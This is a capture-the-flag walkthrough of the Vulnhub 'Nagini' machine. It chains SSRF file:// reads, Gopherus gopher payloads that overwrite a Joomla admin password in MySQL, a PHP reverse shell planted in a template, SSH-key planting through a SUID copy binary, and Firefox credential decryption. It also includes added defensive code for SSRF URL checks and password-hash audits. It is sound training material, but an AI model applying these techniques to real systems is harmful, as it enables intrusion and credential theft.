Vulnhub's Nagini
2022-07-03 11:52:00 【Plum_ Flowers_ seven】
Contents
I. Live host discovery
II. Port scanning
III. Service version discovery
IV. Information gathering
V. Directory brute-forcing
1. Default wordlist
2. SecLists wordlist
VI. Information gathering
VII. Configuring HTTP/3
VIII. Information gathering
IX. SSRF vulnerability
X. Logging in as snape
XI. su_cp
XII. Writing the public key and transferring it with scp
1. Generating the key pair
XIII. Logging in as hermoine
XIV. Privilege escalation
I. Live host discovery
II. Port scanning
III. Service version discovery
Still only ports 80 and 22 are open.
IV. Information gathering
The main page is just an image, and viewing the source with Ctrl+U turns up nothing.
V. Directory brute-forcing
1. Default wordlist
It turns up a Joomla CMS login page
and the Joomla administrator login page.
That is not enough to get a foothold, so switch wordlists and scan again.
2. SecLists wordlist
This time a note.txt turns up.
VI. Information gathering
1. Read the note
It contains a hint: the domain name must be accessed over HTTP/3.
2. Try binding the hostname
sudo vim /etc/hosts
Visiting the hostname gives the same result as visiting the IP.
VII. Configuring HTTP/3
1. Download quiche
git clone --recursive https://www.github.com/cloudflare/quiche
2. Install cargo
sudo apt install cargo
3. Install cmake
sudo apt install cmake
4. Build the examples
cd ./quiche
cargo build --examples
This fails with an error, so continue with the next steps.
5. Remove the distribution's rustc
apt purge rustc
6. Reinstall Rust with rustup
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
7. Load the environment variables
source $HOME/.cargo/env
8. Build again
cargo build --examples
9. Check the build
cargo test
A long list of "ok" lines and no errors.
10. Use the HTTP/3 client to visit the URL
The response lists a directory and mentions a backup file; try visiting it.
VIII. Information gathering
1. Following the first hint we visit this directory and find an interface that fetches internal network resources: an SSRF vulnerability.
2. There is a configuration backup file
The directory listing shows a configuration backup, which can be downloaded.
3. Backup file
From it we collect the username, password and database name used to log in to the database.
IX. SSRF vulnerability
1. The file:// pseudo-protocol
Reading /etc/passwd through the SSRF gives several useful pieces of information: which users have /bin/bash as their login shell, and the mysql account. This confirms that a MySQL database is present; combining the SSRF with the gopher:// pseudo-protocol lets us reach internal services.
2. Read the backup file
The SSRF with the pseudo-protocol can also read the backup file.
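As an added example (not code from the original write-up), this is the defensive counterpart of the "internal resource fetch" interface abused above: the validation a server-side fetcher should apply to a user-supplied URL. It allows only http and https, so file:// and gopher:// are refused outright, and it resolves the host before fetching and refuses any target that lands on a loopback, RFC 1918, link-local or otherwise non-public address. The names `check_fetch_url`, `resolve` and `is_public_address`, and the sample URLs, are my own.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Only plain web schemes may be fetched; file://, gopher://, dict:// etc. are refused.
ALLOWED_SCHEMES = {"http", "https"}


def resolve(host):
    """Resolve host to the set of IP addresses it points at (numeric hosts need no DNS)."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    # Strip an IPv6 scope id ("fe80::1%eth0") so ipaddress can parse the text.
    return {info[4][0].split("%")[0] for info in infos}


def is_public_address(text):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(text)
    if ip.is_multicast or ip.is_loopback or ip.is_link_local or ip.is_private:
        return False
    return ip.is_global


def check_fetch_url(url, resolver=resolve):
    """Return (ok, reason). ok is True only for http(s) URLs whose every resolved
    address is public. The resolver is injectable so the check can be tested offline."""
    parts = urlparse(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {scheme!r}"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL are not allowed"
    try:
        addresses = resolver(host)
    except (OSError, ValueError) as exc:
        return False, f"cannot resolve {host!r}: {exc}"
    if not addresses:
        return False, f"{host!r} resolved to no addresses"
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"{host!r} resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample requests of the kinds that appear in the write-up above.
    for candidate in ("file:///etc/passwd",
                      "gopher://127.0.0.1:3306/_",
                      "http://127.0.0.1/backup.zip",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://93.184.216.34/"):
        print(candidate, "->", check_fetch_url(candidate))
```

Two design points: the fetcher must connect to the address that was checked rather than resolving the name a second time, or a DNS answer that changes between the check and the connection sidesteps the test; and any HTTP redirect the fetch follows must go through `check_fetch_url` again, since a public host can redirect to an internal one.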
3. Attacking MySQL through gopher
(1) Download the tool
git clone https://www.github.com/tarunkant/Gopherus.git
(2) Usage
Each payload has to be submitted to the SSRF interface more than once; sometimes no result comes back the first time.
Generate a payload to list the tables,
then generate another payload to list the columns.
Analysing the output yields the account name and password hash:
$2y$10$cmQ.akn2au104AhR4.YJBOC5W13gyV21D/bkoTmbWWqFWjzEW7vay
The hash is too strong to crack.
(4) Overwrite the site_admin password
echo "123" | md5sum
e7df7cd2ca07f4f1ab415d457a6e1c13
(5) Write it to the database
use joomla;update joomla_users set password="e7df7cd2ca07f4f1ab415d457a6e1c13" where username="site_admin";
(6) Log in to the administrator backend
site_admin/123
(7) Write the reverse shell file
Use the PHP reverse shell that ships with Kali.
Reverse shell path: /usr/share/webshells/php
Template path: /joomla/templates/protostar/error.php
Write it into the template.
(8) Visiting the template page triggers the reverse shell.
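Steps (4) and (5) work because the application still accepts a bare MD5 value in the password column alongside the bcrypt hashes it normally stores. As an added example (not code from the original write-up), this small audit classifies the stored hash of every user and reports the ones that are not bcrypt, which is exactly what the tampering above leaves behind. The regexes, the `classify_hash` and `audit_users` names and the sample rows are my own; the bcrypt value is the one recovered in the write-up, and the MD5 values are computed inline.

```python
import hashlib
import re

# Hash formats seen in the write-up (assumption: not an exhaustive list of what the
# CMS ever stored): modern bcrypt, and legacy MD5 with or without a ":salt" suffix.
BCRYPT_RE = re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")
MD5_HEX_RE = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)
MD5_SALTED_RE = re.compile(r"^[0-9a-f]{32}:[^\s:]{1,64}$", re.IGNORECASE)


def classify_hash(stored):
    """Name the hash scheme a stored password value uses."""
    if BCRYPT_RE.match(stored):
        return "bcrypt"
    if MD5_HEX_RE.match(stored):
        return "md5-unsalted"
    if MD5_SALTED_RE.match(stored):
        return "md5-salted"
    return "unknown"


def audit_users(rows):
    """rows: iterable of (username, stored_hash), e.g. the result of
    SELECT username, password FROM joomla_users.
    Returns the entries that are not bcrypt: legacy hashes or a tampered column."""
    return [(user, classify_hash(h)) for user, h in rows if classify_hash(h) != "bcrypt"]


# Constructed sample table. The bcrypt row is the hash recovered in the write-up;
# the MD5 rows are computed here and do not come from any real system.
SAMPLE_ROWS = [
    ("site_admin", "$2y$10$cmQ.akn2au104AhR4.YJBOC5W13gyV21D/bkoTmbWWqFWjzEW7vay"),
    ("editor", hashlib.md5(b"123").hexdigest()),
    ("legacy_user", hashlib.md5(b"hunter2" + b"salt").hexdigest() + ":salt"),
]

if __name__ == "__main__":
    for user, kind in audit_users(SAMPLE_ROWS):
        print(f"{user}: {kind} (not bcrypt, needs a reset)")
```

Run periodically against the real table, the audit flags both old accounts that were never migrated to bcrypt and a bcrypt hash that has been replaced with a plain MD5 value as in step (5); the fix for either is to force a password reset and to disable acceptance of the legacy format.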
X. Logging in as snape
Through the shell above we can read creds.txt and obtain a base64-encoded password.
Decode it:
echo " " | base64 -d
In Harry Potter, Professor Snape loves Lily, so guess that this is snape's password.
1. flag1.txt
SlythEriN's LocKEet dEstroYeD bY RoN
XI. su_cp
There is a su_cp binary here with the SUID bit set; its function is to copy files.
XII. Writing the public key and transferring it with scp
1. Generate the key pair
ssh-keygen
2. Upload the public key
scp id_rsa.pub [email protected]~/
3. Rename it and change the permissions
mv id_rsa.pub authorized_keys
chmod 640 authorized_keys
4. Copy it into hermoine's .ssh directory
./su_cp -p ~/id_rsa.pub ../.ssh
XIII. Logging in as hermoine
Get the second flag.txt and decode it:
Helga Hufflepuff's Cup destroyed by Hermione
XIV. Privilege escalation
1. Discovery
In the home directory there is a hidden .mozilla folder containing a firefox profile. Firefox is normally only found on client machines, yet here it is on the server, so it can be used for privilege escalation.
2. Download the tool for reading Firefox stored credentials
git clone https://github.com/unode/firefox_decrypt.git
3. Copy the Firefox profile to the local machine
scp -r [email protected]:~/.mozilla/firefox ./
4. Run firefox_decrypt
5. Log in directly over SSH
After decryption:
Diadem of Ravenclaw destroyed by [email protected]